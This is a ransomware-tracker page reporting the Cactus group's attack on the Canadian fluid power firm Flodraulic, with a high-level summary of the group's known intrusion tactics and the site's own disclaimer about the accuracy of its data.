Flodraulic Faces Major Data Breach from Cactus Ransomware Attack
Incident Date:
September 3, 2024
Overview
Title
Flodraulic Faces Major Data Breach from Cactus Ransomware Attack
Victim
Flodraulic
Attacker
Cactus
Location
First Reported
September 3, 2024
Flodraulic Hit by Cactus Ransomware Attack
Flodraulic, a prominent player in the fluid power and control systems industry, has recently fallen victim to a ransomware attack orchestrated by the Cactus ransomware group. The attack has led to the exfiltration of 32GB of sensitive data, with less than 1% of the stolen information disclosed so far. The compromised data includes personal and corporate information of employees, customer details, business contracts, project specifics, technical drawings, financial documents, and corporate correspondence.
About Flodraulic
Founded in 1980 in Toronto, Canada, Flodraulic has grown into a comprehensive fluid power and control systems provider, specializing in hydraulic and pneumatic technologies. The company operates globally, with a workforce of approximately 649 employees across North America and Europe. Flodraulic is known for its high customization and flexibility in designing hydraulic power units and components, integrated hydraulic and electronic solutions, and extensive engineering and technical support. Their commitment to innovation and R&D has positioned them as a leader in motion control technologies.
Attack Overview
The ransomware attack on Flodraulic has resulted in significant financial and reputational damage, estimated at $58.4 million. The breach poses substantial risks to the company's confidentiality and financial stability, given the sensitive nature of the exposed information and the company's international presence. The attack highlights vulnerabilities in Flodraulic's cybersecurity measures, particularly in protecting against sophisticated ransomware threats.
About the Cactus Ransomware Group
Identified in March 2023, the Cactus ransomware group has quickly become a notable player in the ransomware landscape. The group employs sophisticated tactics, including exploiting vulnerabilities in VPN appliances and leveraging phishing attacks to gain initial access. Cactus ransomware is known for its double-extortion strategy, encrypting data and threatening to leak sensitive information if the ransom is not paid. The malware uses advanced evasion techniques, such as encrypting its own binary, to avoid detection by antivirus software.
Penetration and Impact
Cactus primarily gains access to networks by exploiting known vulnerabilities in VPN devices, notably those from Fortinet, and vulnerabilities in data analytics platforms like Qlik Sense. The group also purchases stolen credentials from underground forums to facilitate their intrusions. Once inside a network, Cactus establishes command and control communications via SSH and utilizes Scheduled Tasks to maintain persistence. The malware performs network scanning to identify additional targets and often disables security software to facilitate its operations.
Recent Ransomware Attacks
The Recent Ransomware Attacks (RRA) site acts as a watchtower, providing you with near real-time ransomware tracking of attacks, groups and their victims. Given threat actors’ overarching, lucrative success so far, ransomware attacks have become the most ubiquitous, and financially and informationally impactful cyber threat to businesses and organizations today.
The site’s data is generated based on hosting choices of real-world threat actors, and a handful of other trackers. While sanitization efforts have been taken, we cannot guarantee 100% accuracy of the data. Attack updates will be made as source data is reported by reputable sources. By viewing, accessing, or using RRA you acknowledge you are doing so at your own risk.